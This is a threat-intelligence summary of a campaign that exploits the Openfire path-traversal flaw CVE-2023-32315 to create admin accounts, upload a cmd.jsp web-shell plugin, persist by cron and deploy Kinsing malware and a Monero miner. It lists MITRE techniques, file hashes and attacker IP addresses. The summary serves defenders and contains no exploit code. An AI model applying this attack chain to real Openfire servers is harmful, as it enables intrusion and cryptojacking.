Openfire CVE-2023-32315 is being exploited to deploy Kinsing malware and a cryptominer via a path traversal attack that grants unauthenticated access to the setup environment. Aqua Nautilus observed a campaign with a high attack volume (over 1,000 attacks in under two months) and details how attackers gain admin access, upload plugins, and deploy payloads. #Kinsing #Openfire #CVE-2023-32315 #Monero #Metasploit #AquaPlatform
Keypoints
- Attackers exploit CVE-2023-32315 in Openfire to perform a path traversal that exposes the setup environment to an unauthenticated user.
- The vulnerability enables creating a new admin user and uploading malicious plugins, giving attackers full server control.
- A malicious plugin (cmd.jsp) acts as a backdoor, allowing command execution and file downloads on the server.
- Persistence is achieved via a secondary payload that creates a cronjob and disrupts competing attacks.
- The campaign includes broad C2 communication and download activity, culminating in the deployment of the Kinsing malware and a Monero cryptominer.
- Shodan-based survey showed thousands of Openfire instances exposed worldwide, with hundreds vulnerable, and a honeypot confirmed ongoing targeted activity (mostly Kinsing).
MITRE Techniques
- [T1190] Exploit Public-Facing Application β The attacker exploits the Openfire CVE-2023-32315 path traversal to access the setup environment. βThis vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment.β
- [T1136] Create Account β The attacker can create a new admin user with elevated permissions. βThis then allows the threat actor to create a new admin user and upload malicious plugins.β
- [T1505.003] Web Shell β A backdoor in the uploaded plugin (cmd.jsp) enables downloading files and executing commands on the server. βThis plugin contains a Java class named cmd.jsp that is a backdoor which enables downloading files and executing commands on the server.β
- [T1053.005] Cron β The secondary payload creates a cronjob for persistence on the server. βThis script creates a cronjob and delete competition, so itβs designed to make persistence on the server.β
- [T1071.001] Web Protocols β The malware communicates with a C2 server over web protocols. βNext a broad communication between the C2 server and the malwareβ¦β
- [T1496] Resource Hijacking β The Monero cryptominer is downloaded and run on the compromised container. βThe file kdevtmpfsi (a Monero cryptominer) is downloaded into the container.β
Indicators of Compromise
- [File] β Kinsing binary and cryptominer payloads detected via multiple SHA256 hashes; e.g., 0a28885748fcd4a9709e829bfec4718756c01b0cc498d61e8936fddf1f0b0203, 32acdf28ddcdcfe360f04235501189204424e46e091738cc757c970c9dd4e98e
- [IP Addresses] β Attacker IPs observed in the campaign; e.g., 109.237.96.251, 109.237.96.124
- [IP Addresses] β Additional attacker/compromised-host addresses shown in the IOCs; e.g., 5.35.101.62, 103.164.138.183, 51.222.154.100, 65.21.151.9
- [File] β Malicious plugins (JARs) used in the attack; e.g., Kinsing Plugin with SHA256 871e3151d736b7402efdab403eb4e44d50544161814da9a348df9debd3e4ebf3, Metasplopit Plugin SHA256 3d43218f0e503e9ebc63eff76df7a63ab20a0e9dc971fa70df8bb6f521ae1794
- [File] β Additional plugin and backdoor components (e.g., Backdoor Plugin SHA256 4cc22c8064c713466edfb1fb367c1c7e166014a67e4db1a308c92a012dd2827a)
- [IP Addresses] β Malware host association: 185.154.53.140 (malware host)
Read more: https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability